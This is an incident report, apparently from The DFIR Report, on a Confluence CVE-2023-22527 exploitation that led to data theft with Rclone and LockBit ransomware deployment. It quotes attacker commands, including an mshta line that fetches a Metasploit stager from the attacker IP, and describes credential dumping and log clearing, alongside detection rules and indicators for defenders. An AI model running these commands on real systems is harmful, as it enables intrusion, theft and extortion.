Confluence Exploit Leads to LockBit Ransomware

ChatGPT paged: Each PDF page to text, then ChatGPT 4o (detailed)
Gemini 2.0: Full PDF with gemini-2.0-flash (8k output token limit)
Gemini 2.5: Full PDF with gemini-2.5-flash-preview-05-20 (65k output tokens limit)
Original: All text extracted from PDF

Original Text
Confluence Exploit Leads to LockBit RansomwareKey TakeawaysThe intrusion began with the exploitation of CVE-2023-22527 on an exposed Windows Confluence server,ultimately leading to the deployment of LockBit ransomware across the environment.The threat actor leveraged various tools, including Mimikatz, Metasploit, and AnyDesk.The threat actor leveraged RDP for lateral movement, deploying LockBit ransomware through multiple methods,including copying files over SMB shares for remote execution and automated distribution via PDQ Deploy.Sensitive data was exfiltrated using Rclone, transferring files to MEGA.io cloud storage.The intrusion had a rapid Time to Ransom (TTR) of around just two hours.The DFIR Report ServicesExplore this case in-depth with our hands-on DFIR Labs!Private Threat Briefs: 20+ private DFIR reports annually.Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.All Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insightsreports, long-term tracking, data clustering, and other curated intel.Private Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT&CK with test examples.DFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactivelabs are available with different difficulty levels and can be accessed on-demand, accommodating various learningspeeds.Table of Contents:Case SummaryAnalystsInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential Access DiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpactTimelineDiamond ModelIndicatorsDetectionsMITRE ATT&CKCase SummaryThe intrusion started with the exploitation of CVE-2023-22527, a critical remote code execution vulnerability inConfluence, against a Windows server. The first indication of threat actor activity was the execution of systemdiscovery commands, including net user and whoami.Shortly after, the threat actor attempted to download AnyDesk via curl, but the attempt initially failed. They thenpivoted to using mshta to retrieve a remote HTA file containing a Metasploit stager. After establishing commandand control with the Metasploit server, they leveraged it to successfully download and install AnyDesk. Onceinstalled, AnyDesk was configured with a preset password, providing the threat actor with persistent remote access.Within ten minutes, the threat actor began process enumeration using tasklist, identifying several processes ofinterest, which they then terminated. We assess that these processes belonged to a prior threat actor, and by killingthem, the attacker ensured exclusive control over the server. Notably, they terminated PowerShell, inadvertentlykilling their own Metasploit process. This forced them to rerun the exploit to drop a new Metasploit stager andreestablish command and control. After regaining access, they created a new local account and added it to theAdministrators group.They accessed the beachhead host via rdp, using a newly created local account and then executed Mimikatz. Next,they leveraged SoftPerfect’s NetScan to enumerate remote hosts across the network. Using this information, theytargeted a backup server, moving laterally via RDP using the default Administrator account.On the backup server, the threat actor executed a PowerShell script, Veeam-Get-Creds-New.ps1, to extract Veeamcredentials. They then pivoted to a file share server via RDP. Once on the file server, they deployed Rclone toexfiltrate data to MEGA.io. Following the exfiltration, they cleared all Windows event logs on the file server.The threat actors then pivoted to a domain controller via RDP using domain administrator credentials. Once on thedomain controller, they enumerated domain administrator group memberships. Meanwhile, they returned to the backup server to review its configuration.Shortly after, the threat actor launched LockBit ransomware across the environment. They began by manuallyexecuting the ransomware on a backup server and a file share server over their active RDP sessions. To ensurewidespread encryption, they then shifted to the beachhead host, where they leveraged PDQ Deploy, a legitimateenterprise deployment tool, to automate ransomware distribution across the rest of the network.Using PDQ Deploy, the threat actors distributed the ransomware binary and a batch script to remote hosts overSMB. They then remotely executed the script via PDQ, triggering ransomware deployment across multiple systems.Next, they pivoted to an Exchange server.On the Exchange server, the threat actor stopped key services using net stop and taskkill. They then deployed aransomware binary alongside a new batch script, which, when executed, initiated ransomware encryption. Thisscript was designed to mount remote systems’ C$ shares, effectively enabling a secondary encryption wave—afailsafe mechanism in case PDQ Deploy had missed any targets.The Time to Ransomware (TTR) was just over 2 hours (02:06:14), making it an extremely rapid intrusion.If you would like to get an email when we publish a new report, please subscribe here.AnalystsAnalysis and reporting completed by Angelo Violetti, @malforsec, teddy_ROxPinInitial AccessIn early February 2024, we identified a security breach originating from an exposed Windows server. The serverwas compromised through a Confluence remote code execution (RCE) vulnerability that was disclosed on January16, 2024. The vulnerability arises from improper handling of user-supplied input within certain template files in Confluence.Specifically, files like confluence/template/xhtml/pagelist.vm accept parameters that are passed to potentiallydangerous functions without sufficient sanitization. For instance, the $stack.findValue function can be manipulatedto inject malicious Object-Graph Navigation Language (OGNL) expressions, leading to arbitrary code execution.Threat actors can exploit this vulnerability by sending crafted HTTP POST requests to specific endpoints, such as /template/aui/text-inline.vm, with malicious payloads in the parameters. Additional details about the vulnerabilitycan be found in those reports: Trend Micro and Splunk.ExecutionAfter running initial discovery commands the threat actor attempted to download an AnyDesk installer from theirserver using the exploit. Confluence RCE ExploitationThe threat actor initially gained access by exploiting a server-side template injection vulnerability(CVE-2023-22527, CVSS 10.0) in an exposed Atlassian Confluence server. This vulnerability allows anunauthenticated threat actor to execute arbitrary commands on the target server by injecting OGNL expressions.The exploitation started from the IP address 92[.]51.2.22 as shown by the following Suricata alert. The first commands executed by the threat actor were net user and whoami. These were used to enumerate the useraccounts on the compromised Windows server and to gather information about the currently affected user.Moreover, the exploitation was likely made through a Python script based on the user-agent used. This encoded command spawns another PowerShell process with an obfuscated command line. To deobfuscate the command line, it’s necessary to:Remove the + symbol, which concatenates strings.Replace {0}, {1} and {2} respectively with =, 6 and P.Base64 decode the resulting string.Gzip decompress the base64 decoded string.The result is the following PS script, which performs the following actions:Gets the pointers to specific Windows API functions: VirtualAlloc(), VirtualProtect(), CreateThread() andWaitForSingleObject().Allocates a new region of memory via VirtualAlloc() with PAGE_EXECUTE_READWRITE (0x40) permissions.Copies a base64 decoded Metasploit shellcode into the newly allocated region of memory.Changes the protection of the new memory region into PAGE_EXECUTE (0x10).Creates a new thread pointing to the start of the new memory region to execute the Metasploit shellcode.Waits for the end of the shellcode execution. The Metasploit shellcode can be emulated through speakeasy to identify the command and control server. The execution of curl failed to download the AnyDesk installer though. This did not stop the threat actor who latersuccessfully downloaded an AnyDesk installer by other means.MeterpreterApproximately ten minutes after gaining initial access, the threat actor leveraged the native Windows mshta.exeutility to download and execute a Metasploit stager.mshta http://92.51.2[.]22:443/UsySLX1n.htaAs outlined in the lolbas project, this technique enables the threat actor to drop a payload into the INetCachedirectory and execute it directly from there, leveraging trusted system utilities to evade detection. The HTA file executes an encoded PowerShell command. The contents of the HTA file: PersistenceAs part of the AnyDesk installation on the beachhead, a service was installed to ensure the instance becameavailable again after a restart. The following PowerShell command was executed to download AnyDesk:powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi', 'AnyDesk.msi')The Windows System event 7045 shows service creations. The details show that AnyDeskMSI.exe will be started,and the start type is set to auto, so it will run after a restart of the server. The threat actor used both valid accounts and created a new account on the beachhead host. The user “backup” wascreated, given a password, and added to the local “Administrator” group. Sysmon event code 1 shows thecommands ran to perform the activity: Windows Security events 4720 “A user account was created” and 4732 “A member was added to security enabledlocal group” show the creation of the user and then adding the user to the Administrators group. As the usernamedoes not show in the 4732 event. Make sure to compare the unique Security Identifier(SID): Privilege EscalationConfluence RCE provided SYSTEM access to the beachhead. This was utilized to create a local administrator usernamed ‘backup’. With the ‘backup’ user, the threat actor was able to RDP to the beachhead with a proxy connectionvia their Metasploit payload and execute mimikatz. The mimikatz execution resulted in the disclosure of an easilycrackable hash for the ‘Administrator’ account on the beachhead. Unfortunately, this password was re-used acrossthe hosts in the environment. Utilizing the ‘Administrator’ account on a File Server, the threat actor was able tolocate cleartext credentials for other privileged accounts account (see ‘Credential Access‘).Defense EvasionThrough their RDP session on the beachhead, the threat actor typed ‘virus’ in the start menu search to navigate tothe ‘Virus & threat protection’ settings to ensure Windows Defender was completely turned off. After exfiltrating data off the file server via Rclone, the Windows event logs were cleared via PowerShell: The wevtutil switches used:el \| enum-logs List log namescl \| clear-log Clear a logThe threat actor also deleted the files they brought into the environment: Credential AccessMimikatz was executed on the beachhead host just 20 minutes after initial access was performed. This was visiblein the memory on the host as Anydesk wrote the file to disk. Sysmon event code 1 showed the execution of Mimikatz: Sysmon event code 10 showed that Mimikatz accessed the LSASS process, and we can also see subsequentGrantedAccess for Mimikatz 0x1010 , which translates to: PROCESS_QUERY_LIMITED_INFORMATION(0x1000) and PROCESS_VM_READ (0x0010) . Sysmon event code 11 shows that the Mimikatz process creates a file called passwords.txt: Finally, the threat actor reviewed the captured passwords by opening the newly generated password file in Notepad,as documented in Sysmon event code 1: The threat actor also ran the script Veeam-Get-Creds-New.ps1 on the backup server: Powershell scripts are logged under event code 4104 if powershell script block logging is enabled: The script looks to be from the sadshade/veam-creds GitHub repository, and the script tries to get credentials fromthe Veeam credential manager.The threat actor also discovered a txt file on a file share server that contained IT-related cleartext passwords.Included were the credentials for a Domain Admin account. Through their RDP session, they proceeded withopening the the txt file using Notepad. Illustrated below via the process execution evidence: DiscoveryThe following commands were executed via the Confluence RCE:net userwhoamiquery user From the Meterpreter session, tasklist was used to enumerate the running processes. This threat actor identified C2processes that were established by a different actor and used ‘taskkill’ to end them. During this task, we noticed a threat actor blunder: the ‘taskkill’ execution on ‘powershell.exe’ killed their ownMeterpreter session. Consequently, they re-exploited Confluence to establish yet another Meterpreter session.Then, further discovery commands were executed on the host:query usernet userhostnameipconfig NetScan was then utilized to enumerate the local network: When NetScan is executed with the ‘Check for write access’ option enabled, a ‘delete.me’ file is created then deletedon discovered shares. We can observe this in Event ID 5145: After moving to a Domain Controller, ‘query user’ was once again executed. Then the Domain Admins group wasenumerated, after a typo: Lateral MovementThroughout the intrusion, RDP was used for lateral movement. The ‘Remote Desktop Connection’ app (mstsc.exe)was used on the Confluence beachhead to interactively logon to targeted hosts in the environment. The Event ID4624 logon activity: Lateral movement with RDP was done to different hosts in swift succession. Starting under one hour after theinitial compromise of the beachhead host. All RDP was performed from the beachhead. CollectionThe threat actor used Rclone to exfiltrate everything in a file share, see ‘Exfiltration‘ for more details. However,there were a few groups of files that were copied to C:\temp on the beachhead and then deleted about 30 secondslater. Command and ControlMetasploitCommand and control (C2) connections were established via Metasploit from the breached Confluence server tothe IP address 92.51.2[.]22 which is hosted in the provider called Flyservers S.A., reported in other blogs for beingused by LockBit affiliates. The connections were made to the port 4321. When downloading the Meterpreter HTA stager, the threat actor downloaded it by using a user-agent associatedwith Internet Explorer. AnyDeskA second C2 server 92.51.2[.]27 was employed to connect to AnyDesk. Through Fofa, it was possible to identify the hostname, WIN-EKIHV2OQQP8, associated with the server in theperiod related to the incident. This hostname was observed in the login activity on the beachhead host for this intrusion. The hostname can be traced through the certificate on the RDP service (port 3389), valid since the end of October2023. By searching for this hostname in fofa.info, it was possible to identify multiple IP addresses that were associatedwith malicious activities in VirusTotal in the past, some examples in the following image. The same hunt on Censys allowed us to identify six IP addresses which were potentially associated with theShadowSyndicate ransomware group based on a tweet made by @JRehbergCSK. Some of the identified IP addresses like 194.165.16[.]60 and 45.227.252[.]227 were also mentioned in a Group-IBReport about ShadowSyndicate.The AnyDesk connection was utilized to drop tools to enumerate the infrastructure, access credentials and exfiltrateand encrypt data. ExfiltrationJust one hour and eleven minutes after initial access the threat actor started exfiltration activity. This was donefrom a file share server, performed with Rclone and exfiltrated to mega (Mega.nz). We have previously reported onthe usage of rclone several times. We were able to retrieve the Rclone configuration file used: As shown above the configuration file is encrypted and password protected. Fortunately the threat actor had badopsec and reused a password so we were able to decrypt the file using the “rclone config show” command: From Zeek network logs we see data being exfiltrated: The next deployment process began with PDQ Deploy being executed from the beachhead system. Organizationscan utilize the PDQ Deploy to remotely and efficiently create multi-step deployments for end users, supportingvarious formats such as .exe, .msi, .bat, .ps1, and .vbs. PDQ Deploy allows administrators to execute scripts andcommands (e.g., PowerShell, VBScript, and batch files) on remote computers and groups integrated withSpiceworks, Active Directory, or PDQ Inventory. The tool also provides deployment reports to monitor and tracksuccessful deployments.PDQ Deploy operates through two Windows services:PDQDeployService.exe is the background service that manages all schedules and deployments on the console.PDQDeployRunner-n (e.g., PDQDeployRunner-1) is the target service executed on remote hosts to perform thedeployments.During deployment, the target service and installation files for the deployment package are copied to a directory onthe target computer’s default share, enabling the execution of deployment tasks. To facilitate the ransomware deployment with PDQ the threat actor created a file called asd.bat to launch theLockBit executable. asd.bat content: We were able collect the PDQ .db files from C:\ProgramData\Admin Arsenal\PDQ Deploy\ on the beachhead to seethe deployment data created by the threat actor. Suricata was also alerting on the activity: From the network traffic we see HTTP posts done with rclone: ImpactAfter around two hours into the intrusion, the threat actor transferred PDQ Deploy and the LockBit Blackexecutable, under the C:\Temp folder on the beachhead host. The same files were then also created on the domaincontroller. PDQ Deploy is a software tool designed for automating patch management and deploying applications.In this case, it was leveraged to facilitate the deployment of the LockBit ransomware. Before the threat actor used PDQ they first ran the LockBit binary manually over RDP sessions on the back serverand file server. Threat actor logged in via their ‘backup’ user: Domain Admin User/Credentials used to deploy: Files included in PDQ library: Several runs of the deployment package by the threat actor: Several ways to attempt to execute the ransomware including calling the file, command arguments, and finally thebatch file: Once the threat actor started the deployment we observed both PDQ service runners and the package files(ransomware and batch file) being deployed over SMB. This batch file was then executed on hosts across the environment via the PDQ runner. After completing the deployment using PDQ, the threat actor connected to an Exchange server using RDP. They issued a few commands to stop running processes associated with Exchange and SQL on the server:process net stop MSExchangeUMprocess taskkill /f /im sql*They then dropped a batch file, test.bat, which contained a list of the systems found earlier during the intrusion, aswell as a ransomware execution command. This appears to have been a backup to try and hit systems that may havebeen missed during the PDQ deployment. Below is an extract of the test.bat contents: Computedasd.bat438448FDC7521ED034F6DABDF814B6BAF08E7343A94897ADEAE78138CC3F9142ED160A031E2E25A996F72089F12755F931E7FCA9B64DD85B03A56A9871FD6BB8F2CF1DBBnetscan.exeD7ADDB5B6F55EAB1686410A17B3C867BA54AF16B2702FE0E5C569F6D8F17574A9FDAF197498BA0AFA5D3B390F852AF66BD6E763945BF9B6BFF2087015ED8612A18372155test.bat9D495530A421A7C7E113B7AFC3A5050402D291E2FF5799A13EACC72AD0758F2C5E69D414594F2F8AB05F88F765D05EB1CF24E4C697746905A61ED04A6FC2B744DD6FEBB0Veeam-Get-Creds-New.ps13BD63B2962D41D2E29E570238D28EC0E9537E1C4E5DDD7FB9B98C532CA89A9DB08262AB47AA8E510B9C3B5D39F84E4C2FA68C81DA888E091436FDB7FEE276EE7FF87F016BehavioralLSASS Memory - T1003.001System Network Configuration Discovery - T1016Remote System Discovery - T1018Remote Desktop Protocol - T1021.001System Owner/User Discovery - T1033Network Service Discovery - T1046Process Discovery - T1057PowerShell - T1059.001Windows Command Shell - T1059.003Clear Windows Event Logs - T1070.001Software Deployment Tools - T1072Ingress Tool Transfer - T1105Exploit Public-Facing Application - T1190System Binary Proxy Execution: Mshta - T1218.005Remote Access Software - T1219Data Encrypter for Impact - T1486Credentials In Files - T1552.001Exfiltration to Cloud Storage - T1567.002 After the ransomware attack was completed, the affected files were renamed with the .rhddiicoE extension, and aransom note titled rhddiicoE.README.txt was left on the compromised hosts. Additionally, the desktop background image was modified as part of the ransomware execution. Timeline Diamond Model IndicatorsAtomic92[.]51.2.2292[.]51.2.27 Create or Modify System Process: Windows Service - T1543.003Valid Accounts: Local Accounts - T1078.003DetectionsNetworkET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell StagersET EXPLOIT Atlassian Confluence RCE Attempt Observed (CVE-2023-22527) M1ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dlET HUNTING PE EXE Download over raw TCPET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1ET INFO Dotted Quad Host HTA RequestET INFO User-Agent (python-requests) Inbound to WebserverET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)ET POLICY Possible HTA Application DownloadET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199ET WEB_CLIENT PowerShell call in script 1ET WEB_CLIENT PowerShell call in script 2ET WEB_SERVER Possible SQL Injection (exec) in HTTP Request BodyET WEB_SERVER WebShell Generic - net userET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M1ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M2ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2ETPRO ATTACK_RESPONSE Possibly Malicious VBScript Executing WScript.Shell Run M1ETPRO HUNTING Observed Suspicious Base64 Encoded Wide String Inbound (zip)ETPRO HUNTING Suspicious Offset PE EXE or DLL Download on Non-Standard PortsETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTPETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP 1 M2SigmaSearch rules on detection.fyi or sigmasearchengine.comDFIR Public Rules Repo:8a0d153f-b4e4-4ea7-9335-892dfbe17221 : NetScan Share Enumeration Write Access CheckDFIR Private Rules:1aafd4cc-cb38-498b-9365-394f71fd872c : Veeam Credential Dumping Script (PSH)8a64fe8d-e9d5-4c8c-9716-0ceed9b3b791 : Notepad Password Files Discovery b878e8c2-bfa5-4b1d-8868-a798f57d197a : Veeam Credential Dumping Script Execution53c4b596-8af3-42f3-a974-bddfbf6db731 : Wevtutil.exe Log Clearing Process Execution516c6fbc-949a-4aa7-8727-c041aee56dc0 : Execution of Remote HTA File via mshta.exe8a64fe8d-e9d5-4c8c-9716-0ceed9b3b791 : Notepad Password Files Discovery3a9897de-164a-4b5a-8995-ffdc301d6f6d : Confluence Executing Suspicious Commands7019b8b4-d23e-4d35-b5fa-192ffb8cb3ee : Use of Rclone to exfiltrate data over an SSH channel62047536-b23d-4aef-af94-b6095aea1617 : Data Exfiltration Using Rclone with Cloud StorageSigma Repo:cd951fdc-4b2f-47f5-ba99-a33bf61e3770 : Always Install Elevated Windows Installere32d4572-9826-4738-b651-95fa63747e8a : Base64 Encoded PowerShell Command Detected7d9263bd-dc47-4a58-bc92-5474abab390c : Change Winevt Channel Access Permission Via Registry2f78da12-f7c7-430b-8b19-a28f269b77a3 : Disable Windows Event Logging Via Registryfcddca7c-b9c0-4ddf-98da-e1e2d18b0157 : Disabled Windows Defender Eventlog61065c72-5d7d-44ef-bf41-6a36684b545f : Elevated System Shell Spawned98767d61-b2e8-4d71-b661-e36783ee24c1 : Gzip Archive Decode Via PowerShella642964e-bead-4bed-8910-1bb4d63e3b4d : HackTool - Mimikatz Execution502b42de-4306-40b4-9596-6f590c81f073 : Local Accounts Discoveryf26c6093-6f14-4b12-800f-0fcb46f5ffd0 : Malicious Base64 Encoded PowerShell Keywords in Command Lines183e7ea8-ac4b-4c23-9aec-b3dac4e401ac : Net.EXE Executioncd219ff3-fa99-45d4-8380-a7d15116c6dc : New User Created Via Net.EXEf4bbd493-b796-416e-bbf2-121235348529 : Non Interactive PowerShell Process Spawnedd679950c-abb7-43a6-80fb-2a480c4fc450 : PDQ Deploy Remote Adminstartion Tool Executiond7bcd677-645d-4691-a8d4-7a5602b780d1 : Potential PowerShell Command Line Obfuscation8e0bb260-d4b2-4fff-bb8d-3f82118e6892 : Potentially Suspicious CMD Shell Output Redirectfdb62a13-9a81-4e5c-a38f-ea93a16f6d7c : PowerShell Base64 Encoded FromBase64String Cmdlet3b6ab547-8ec2-4991-b9d2-2b06702a48d7 : PowerShell Download Pattern6e897651-f157-4d8f-aaeb-df8151488385 : PowerShell Web Download86085955-ea48-42a2-9dd3-85d4c36b167d : Process Terminated Via Taskkillb52e84a3-029e-4529-b09b-71d19dd27e94 : Remote Access Tool - AnyDesk Executionb98d0db6-511d-45de-ad02-e82a98729620 : Remotely Hosted HTA File Executed Via Mshta.EXE2aa0a6b4-a865-495b-ab51-c28249537b75 : Startup Folder File Write88872991-7445-4a22-90b2-a3adadb0e827 : Stop Windows Service Via Net.EXE590a5f4c-6c8c-4f10-8307-89afe9453a9d : Suspicious Child Process Created as System7be5fb68-f9ef-476d-8b51-0256ebece19e : Suspicious Execution of Hostnamefb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base645cb299fc-5fb1-4d07-b989-0644c68b6043 : Suspicious File Download From IP Via Curl.EXEd75d6b6b-adb9-48f7-824b-ac2e786efe1f : Suspicious FromBase64String Usage On Gzip Archive - Process Creation03cc0c25-389f-4bf8-b48d-11878079f1ca : Suspicious MSHTA Child Process 754ed792-634f-40ae-b3bc-e0448d33f695 : Suspicious PowerShell Parent Process2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 : Suspicious SYSTEM User Process Creation63332011-f057-496c-ad8d-d2b6afb27f96 : Suspicious Tasklist Discovery Commandce72ef99-22f1-43d4-8695-419dcb5d9330 : Suspicious Windows Service Tamperingd0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6 : Unusually Long PowerShell CommandLinee28a5a99-da44-436d-b7a0-2afc20a5f413 : Whoami Utility Execution8de1cbe8-d6f5-496d-8237-5f44a721c7a0 : Whoami.EXE Execution Anomaly79ce34ca-af29-4d0e-b832-fc1b377020db : Whoami.EXE Execution From Privileged Process671bb7e3-a020-4824-a00e-2ee5b55f385e : WMI Module Loaded By Uncommon ProcessYaraBINARYALERT_Hacktool_Windows_Mimikatz_CopywriteBINARYALERT_Hacktool_Windows_Mimikatz_FilesELASTIC_Windows_Trojan_Metasploit_38B8CeecELASTIC_Windows_Trojan_Metasploit_47F5D54AELASTIC_Windows_Trojan_Metasploit_4A1C4Da8ELASTIC_Windows_Trojan_Metasploit_7Bc0F998ELASTIC_Windows_Trojan_Metasploit_C9773203GODMODERULES_IDDQD_God_Mode_RuleSECUINFRA_SUSP_Powershell_Base64_DecodeSIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1SIGNATURE_BASE_Msfpayloads_Msf_RefSIGNATURE_BASE_Powershell_Susp_Parameter_ComboMAL_RANSOM_LockBit_Apr23_1MAL_RANSOM_LockBit_ForensicArtifacts_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1ELASTIC_Windows_Ransomware_Lockbit_369E1E94CRAIU_Crime_Lockbit3_RansomwareMITRE ATT&CK

Original Text

Confluence Exploit Leads to LockBit RansomwareKey TakeawaysThe intrusion began with the exploitation of CVE-2023-22527 on an exposed Windows Confluence server,ultimately leading to the deployment of LockBit ransomware across the environment.The threat actor leveraged various tools, including Mimikatz, Metasploit, and AnyDesk.The threat actor leveraged RDP for lateral movement, deploying LockBit ransomware through multiple methods,including copying files over SMB shares for remote execution and automated distribution via PDQ Deploy.Sensitive data was exfiltrated using Rclone, transferring files to MEGA.io cloud storage.The intrusion had a rapid Time to Ransom (TTR) of around just two hours.The DFIR Report ServicesExplore this case in-depth with our hands-on DFIR Labs!Private Threat Briefs: 20+ private DFIR reports annually.Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.All Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insightsreports, long-term tracking, data clustering, and other curated intel.Private Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT&CK with test examples.DFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactivelabs are available with different difficulty levels and can be accessed on-demand, accommodating various learningspeeds.Table of Contents:Case SummaryAnalystsInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential Access DiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpactTimelineDiamond ModelIndicatorsDetectionsMITRE ATT&CKCase SummaryThe intrusion started with the exploitation of CVE-2023-22527, a critical remote code execution vulnerability inConfluence, against a Windows server. The first indication of threat actor activity was the execution of systemdiscovery commands, including net user and whoami.Shortly after, the threat actor attempted to download AnyDesk via curl, but the attempt initially failed. They thenpivoted to using mshta to retrieve a remote HTA file containing a Metasploit stager. After establishing commandand control with the Metasploit server, they leveraged it to successfully download and install AnyDesk. Onceinstalled, AnyDesk was configured with a preset password, providing the threat actor with persistent remote access.Within ten minutes, the threat actor began process enumeration using tasklist, identifying several processes ofinterest, which they then terminated. We assess that these processes belonged to a prior threat actor, and by killingthem, the attacker ensured exclusive control over the server. Notably, they terminated PowerShell, inadvertentlykilling their own Metasploit process. This forced them to rerun the exploit to drop a new Metasploit stager andreestablish command and control. After regaining access, they created a new local account and added it to theAdministrators group.They accessed the beachhead host via rdp, using a newly created local account and then executed Mimikatz. Next,they leveraged SoftPerfect’s NetScan to enumerate remote hosts across the network. Using this information, theytargeted a backup server, moving laterally via RDP using the default Administrator account.On the backup server, the threat actor executed a PowerShell script, Veeam-Get-Creds-New.ps1, to extract Veeamcredentials. They then pivoted to a file share server via RDP. Once on the file server, they deployed Rclone toexfiltrate data to MEGA.io. Following the exfiltration, they cleared all Windows event logs on the file server.The threat actors then pivoted to a domain controller via RDP using domain administrator credentials. Once on thedomain controller, they enumerated domain administrator group memberships. Meanwhile, they returned to the backup server to review its configuration.Shortly after, the threat actor launched LockBit ransomware across the environment. They began by manuallyexecuting the ransomware on a backup server and a file share server over their active RDP sessions. To ensurewidespread encryption, they then shifted to the beachhead host, where they leveraged PDQ Deploy, a legitimateenterprise deployment tool, to automate ransomware distribution across the rest of the network.Using PDQ Deploy, the threat actors distributed the ransomware binary and a batch script to remote hosts overSMB. They then remotely executed the script via PDQ, triggering ransomware deployment across multiple systems.Next, they pivoted to an Exchange server.On the Exchange server, the threat actor stopped key services using net stop and taskkill. They then deployed aransomware binary alongside a new batch script, which, when executed, initiated ransomware encryption. Thisscript was designed to mount remote systems’ C$ shares, effectively enabling a secondary encryption wave—afailsafe mechanism in case PDQ Deploy had missed any targets.The Time to Ransomware (TTR) was just over 2 hours (02:06:14), making it an extremely rapid intrusion.If you would like to get an email when we publish a new report, please subscribe here.AnalystsAnalysis and reporting completed by Angelo Violetti, @malforsec, teddy_ROxPinInitial AccessIn early February 2024, we identified a security breach originating from an exposed Windows server. The serverwas compromised through a Confluence remote code execution (RCE) vulnerability that was disclosed on January16, 2024. The vulnerability arises from improper handling of user-supplied input within certain template files in Confluence.Specifically, files like confluence/template/xhtml/pagelist.vm accept parameters that are passed to potentiallydangerous functions without sufficient sanitization. For instance, the $stack.findValue function can be manipulatedto inject malicious Object-Graph Navigation Language (OGNL) expressions, leading to arbitrary code execution.Threat actors can exploit this vulnerability by sending crafted HTTP POST requests to specific endpoints, such as /template/aui/text-inline.vm, with malicious payloads in the parameters. Additional details about the vulnerabilitycan be found in those reports: Trend Micro and Splunk.ExecutionAfter running initial discovery commands the threat actor attempted to download an AnyDesk installer from theirserver using the exploit. Confluence RCE ExploitationThe threat actor initially gained access by exploiting a server-side template injection vulnerability(CVE-2023-22527, CVSS 10.0) in an exposed Atlassian Confluence server. This vulnerability allows anunauthenticated threat actor to execute arbitrary commands on the target server by injecting OGNL expressions.The exploitation started from the IP address 92[.]51.2.22 as shown by the following Suricata alert. The first commands executed by the threat actor were net user and whoami. These were used to enumerate the useraccounts on the compromised Windows server and to gather information about the currently affected user.Moreover, the exploitation was likely made through a Python script based on the user-agent used. This encoded command spawns another PowerShell process with an obfuscated command line. To deobfuscate the command line, it’s necessary to:Remove the + symbol, which concatenates strings.Replace {0}, {1} and {2} respectively with =, 6 and P.Base64 decode the resulting string.Gzip decompress the base64 decoded string.The result is the following PS script, which performs the following actions:Gets the pointers to specific Windows API functions: VirtualAlloc(), VirtualProtect(), CreateThread() andWaitForSingleObject().Allocates a new region of memory via VirtualAlloc() with PAGE_EXECUTE_READWRITE (0x40) permissions.Copies a base64 decoded Metasploit shellcode into the newly allocated region of memory.Changes the protection of the new memory region into PAGE_EXECUTE (0x10).Creates a new thread pointing to the start of the new memory region to execute the Metasploit shellcode.Waits for the end of the shellcode execution. The Metasploit shellcode can be emulated through speakeasy to identify the command and control server. The execution of curl failed to download the AnyDesk installer though. This did not stop the threat actor who latersuccessfully downloaded an AnyDesk installer by other means.MeterpreterApproximately ten minutes after gaining initial access, the threat actor leveraged the native Windows mshta.exeutility to download and execute a Metasploit stager.mshta http://92.51.2[.]22:443/UsySLX1n.htaAs outlined in the lolbas project, this technique enables the threat actor to drop a payload into the INetCachedirectory and execute it directly from there, leveraging trusted system utilities to evade detection. The HTA file executes an encoded PowerShell command. The contents of the HTA file: PersistenceAs part of the AnyDesk installation on the beachhead, a service was installed to ensure the instance becameavailable again after a restart. The following PowerShell command was executed to download AnyDesk:powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi', 'AnyDesk.msi')The Windows System event 7045 shows service creations. The details show that AnyDeskMSI.exe will be started,and the start type is set to auto, so it will run after a restart of the server. The threat actor used both valid accounts and created a new account on the beachhead host. The user “backup” wascreated, given a password, and added to the local “Administrator” group. Sysmon event code 1 shows thecommands ran to perform the activity: Windows Security events 4720 “A user account was created” and 4732 “A member was added to security enabledlocal group” show the creation of the user and then adding the user to the Administrators group. As the usernamedoes not show in the 4732 event. Make sure to compare the unique Security Identifier(SID): Privilege EscalationConfluence RCE provided SYSTEM access to the beachhead. This was utilized to create a local administrator usernamed ‘backup’. With the ‘backup’ user, the threat actor was able to RDP to the beachhead with a proxy connectionvia their Metasploit payload and execute mimikatz. The mimikatz execution resulted in the disclosure of an easilycrackable hash for the ‘Administrator’ account on the beachhead. Unfortunately, this password was re-used acrossthe hosts in the environment. Utilizing the ‘Administrator’ account on a File Server, the threat actor was able tolocate cleartext credentials for other privileged accounts account 